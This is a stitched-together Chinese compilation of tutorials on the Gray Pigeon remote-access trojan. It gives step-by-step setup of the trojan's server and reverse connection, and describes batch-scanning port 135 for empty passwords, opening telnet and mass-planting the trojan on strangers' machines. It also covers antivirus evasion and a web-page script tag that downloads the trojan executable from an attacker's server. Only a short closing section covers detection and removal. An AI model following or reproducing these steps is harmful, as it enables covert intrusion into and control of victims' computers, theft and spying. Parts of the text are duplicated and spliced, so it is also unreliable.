12-反弹端口木马(灰鸽子)的演示

原创作者ｕｎｉｓ远程控制分类与远程协助区别远程控制技术是黑客必学的技术之一。

远程控制不同于远程协助，两者之间有很大的区别，所谓远程协助需要经过被控端的授权允许，并且被控端可以看到控制者的所有操作，使之控制操作透明性；例如我们的QQ远程协助，就需要对方的允许控制进行操作，并且对方也能够看到我们的操作动作，远程协助一般是用来进行远程的计算机操作协助。

远程控制则不一样，远程控制只要在被控者电脑安装一个服务端，即可在不知情的情况下进行控制对方计算机以及对计算机其它操作，控制时不需要经过对方的许可就可以控制，而控制时操作的一些动作，对方也无法察觉到（除鼠标控制）。

远程控制按控制类型可以分类为：（1）正向主动型远程控制（2）反向被动型。

什么是正向主动型的呢？正向主动型是需要控制着主动去连接被控端，一般情况下，控制者必须知道需要被控制者的IP和端口，然后通过某种软件来进行控制被控者，例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP（端口）然后通过客户端软件进行连接对方。

反向被动型控制又可以称为反弹性控制技术，指的是在被控端下安装服务端之后，由被控端主动来寻找你的客户端监听端口软件连接来进行控制，这个好处就是不需要知道对方的IP地址和端口，被控端会自己主动来找我们的监听地址和端口，当我们发现被控端已经找到我们的监听地址和端口，我们就可以控制对方电脑，这样省去要知道对方的IP和端口的麻烦了，特别是对方是动态IP的时候。

反向被动型远控在黑客界已经是主流了，黑客专门使用某些控制软件在控制对方，反弹型远控软件更是数不胜数，例如：花鸽子（灰鸽子）、白金、终结者、Ghost 等等。

远程控制软件的功能与远控木马的特性我们这里主要讲解的是反弹型远控，并且也有讲解到Web型的正向型远控，正向型远控还有Radmin、3389远程桌面也可以值得大家去学习，关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。

灰鸽子使用教程图解（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。

两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。

Netman监控版详细安装方法：1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。

Gray pigeons--灰鸽子是什么呢？灰鸽子简单的说它是远程监控软件,（黑客类）,当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件灰鸽子分为2个部分：客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端（简称：免杀），免杀的话那就是杀毒软件查不到那是一个木马程序！鸽子是国内一款著名后门。

比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

这就好比火药，用在不同的场合，给人类带来不同的影响！（其他的我也说不清楚）如果你会使的话那么它可以做很多事。

NB点的黑客可以通过各种渠道得到它想要的东西,。

（如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用）总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻（前提是需要控制到宽带上网用户）个人对鸽子的认识我对它的了解也不是全面的（现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧！）------------------------------------架设教程-------------------------------------首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧！灰鸽子下载：/file/t06ef189fa（不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜）下好鸽子后解压到任意磁盘或则桌面等任意目录！1.打开 H_Client.exe （鸽子启动程序）（如图）2.去希网注册一个用户信息地址： 如图3.注册好后登录点击【我的控制台】在动态域名(DynamicDNS) 下面有个新建点它如图4.我这有3个那是自己以前建的现在你点了建设后就自己填写一个你想要的数字或则字母组合域名（随便写也可以只要自己可以记住）如图 IP地址如果默认显示的就是你外网IP 如果你是局域网的话那么填写你的本地IP127.0.0.1或则局域网IP也可以，填写好后点【确认】5.下面就下载另外一个软件cn99qdns /file/t0be434e40 下载好后安装它安装方法全部默认如下6.OK 安装完成了默认安装在的路径是 C:\Program Files\cn99qdns 下面打开这个路径 Cn99qdns.exe打开它如图7.点击 Cn99qdns客户端上的管理帐号如图域名：就是第4个步骤叫你新建的动态域名用户：就是第二步叫你注册的用户名口令：第二步注册的那个用户名的密码（注册成功后发到你邮箱的）填写好后点【增加】看到如下图必须显示可用才行如果不可用那么就是希网那的IP错误了自己修正去！出现这个图显示可用后点确认按钮它就托盘了不管他了！---------8.现在什么都搞好了返回灰鸽子软件界面点击软件上的【工具】选择【FTP 服务器】如图9.做了第8步后会弹出个小窗口 FTP服务器填写方法FTP主目录：就是你灰鸽子解压在的目录路径，比如我解压在桌面那就是C:\Documents and Settings\Administrator\桌面\黑防鸽子\服务端口：2121 不用改把那个匿名勾点掉用户名：就是希网注册的用户密码：希网用户的密码填写好后点开启服务如图开启服务后就关掉这个小窗口10.下面点灰鸽子软件上的自动上线按钮如图（点了后会弹出小窗口）弹出小窗口FTP服务器：你在希网新建的域名端口：2121用户名：希网注册的用户名连接类型：PASV登录密码：希网用户名密码密码确认：确认密码然后点【更新IP到FTP空间】显示成功就表示OK 以下是我填写的图自己参考！11.OK了架设就这样基本完成了。

灰鸽子配置内网上线批量扫135端口抓肉鸡设置详细解释加图片说明第一:先打开灰鸽子(如图1)初始界面。

现在开始配置服务端(如图2)其他几项不重要按个人要求来选,主要是填写公网IP、域名填好后生成服务端保存在指定路径！注：本人用的是固定公网IP 所以只需要填写IP 在局域网使用灰鸽子需要做端口映射！介绍一个映射工具=================比特精灵端口映射工具UPnP局域网专用(如图3)===============打开工具以后点下一步它会自动查找UPNP设备 (去掉忽略ICF防火墙前面的勾～)查找出设备后(如图4)下一步开始设置(如图5)设置好后下一步提示添加映射端口成功!(如图6)映射成功后不要关闭工具！==============================================================配置好服务端以后接下来测试一下鸽子是否能上线！只要运行一下(如图7)鸽子配置好测试成功能上线了接下来批量扫135端口抓肉鸡！！用十段S扫描器扫几段IP(如图8)开始以后出现DOS界面扫到的IP全是开135端口的机器(如图9)呵呵还不少呢～～扫完以后DOS界面会自动关系在文件目录下出现一个文档我们用扫描整理器处理一下只保留干净的IP 点“修正并保存文件”处理后在目录下会出现一个的文件！(如图10)找到开135端口的IP 就该用NTscan 这个工具扫135的空口令了！(如图11)就先扫到这里其实还有好多呢！！关闭NTscan以后会在目录下自动建出一个的文件里面还是未经过处理的IP需要把没用的字符去掉保留干净的IP 这里我们用记事本自带的替换功能就可以完成！不用说大家因该都会。

处理后的IP 连空格都需要去掉！(如图12)筛选出开135端口空口令的IP以后需要用一个批量开23端口的工具把这些IP的23端口全部打开！(如图13)点开始工具会自动批量开23端口程序运行还是在DOS界面下处理开好23端口后DOS窗口自动关闭,接下来用端口过滤工具把开好的23端口再次过滤在抓肉鸡的时候更加准确！把刚才找到的文件后缀改成lst为呵呵这个工具只能后缀lst的文件所以要改一下后缀改好后打开工具导入开始过滤！(如图14)下一步导出过滤好的IP另存为文件！操作到这里已经一大半了全是批量处理还不是累就是耗时间接下来是最重要的部分了就是批量传马了废话不多说继续！我们先用Serv-U架设一个FTP 以后在传马的时候会用上(用别人的FTP空间也可以去免费空间申请一个就行本人是自己架设的空间别人的不稳定权限设置的很严格不能上传EXE文件或是下载上传带宽做了限制比较慢)架设FTP我想大家也都会我也就不介绍了！(如图15)是我简单架设的FTPFTP架设好以后配置一下JS脚本！(如图16)安装批量传马的工具安好后运行配置(如图17)打来—>选项—>全局选项—>编辑默认设置—>选正编写好的JS脚本下一步运行批量传马工具填写配置基本和批量开23端口类似！(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀！可怜～～看看有3只肉鸡了！(如图19)哈哈还有一个德国小鸡～～下一步运行批量传马工具填写配置基本和批量开23端口类似！(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀！可怜～～看看有3只肉鸡了！(如图19)哈哈还有一个德国小鸡～～==============此文章只供参考学习若使用给别人带来损失本人概不负责==============OK教程到此结束，请不要用于非法用途哦。

浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

序：灰鸽子是国内一款著名后门。

比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的老大哥。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

灰鸽子是一款反弹连接式的木马。

现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式，有些是直接处于公网上的，但是也有很多都是用路由划分一个或多个vlan，通过NAT共用一个公网IP地址上网。

所以这些用的IP都是内网IP。

如果肉鸡中了灰鸽子的服务端，需要反弹回来连接灰鸽子客户端的8000端口。

但是，拨号上网的IP不是固定不变而是动态IP，每次获得的IP都是不一样的；或者客户端的IP是一个内网IP。

这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。

（8000端口是灰鸽子的默认端口，这个端口是可以更改的）要让鸽子的服务端每次都能找到客户端，反过来说就要让客户端的IP可以让服务端每次都可以找得到。

不管客户端位于公网还是内网，让服务端找得到的方法其实是一样的。

内网上线或者外网上线的方法有很多种：可以绑定一个DDNS 域名（动态域名），可以在路由器上做端口映射，也可以用鸽子自带的vport工具做端口映射……总之方法很多，设置也很简单。

如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。

如果没有路由器的控制权呢，只能找一个有着公网IP地址的肉鸡来做端口映射了。

因为我的上网环境是处在一个局域网，通过交换机和路由器公用一个公网IP上网，又不能获得路由器的控制权，所以我要讲的是vidc这个工具。

因为用这个vidc最大的优点就是永远不会被杀毒软件查杀，这个vidc根本就不在杀毒软件的打击范围，这个不是我一个人说的，是很多黑客老前辈说的，并且我也亲身做过实验，用360杀毒、瑞星和国外杀软avast都进行过扫描，全部都是正常。

灰鸽子病毒（Backdoor.Gpigeon）介绍及清除方法-电脑资料
灰鸽子的特点是“三个隐藏”——隐藏进程、隐藏服务、隐藏病毒文件，。

灰鸽子2005感染系统后，将自身注册为系统服务，并在同一目录下生成一组（3个）隐藏的病毒文件.
HijackThis是荷兰学生merijn开发系统扫描工具，能够扫描系统版本，进程，启动项，服务项等信息，对于分析解决IE浏览器问题,以及分析病毒，木马问题有很大帮助
HijackThis扫描的log可用记事本打开。

用HijackThis 1.99.1 扫描系统信息，可以帮助解决问题
下载地址:
扫描出的结果很多都是无害的甚至是正常系统必须的,如果不是非常有把握，请勿修改!
使用方法: 解压到一个文件夹，运行HijackThis“扫描系统并保存日志”，把日志文件保存到桌面，然后用记事本打开那个文件,找到病毒所在处.
复以下项目：O23 - NT 服务: pms (Portable Media Serial) - Unknown owner - C:/WINDOWS/IEXPL0RE.EXE !
修复后重启电脑，全盘杀毒，
电脑资料
《灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法》(https://www.)。

在“安全模式”下，在“文件夹选项”的“查看”面板中勾选“显示系统文件夹内容”、“显示所有文件及文件夹”两个选项，按“确定”按钮。

根据HijackThis日志中提示的病毒文件所在路径，找到病毒文件，删除之。

重启系统，手工杀毒即告完成。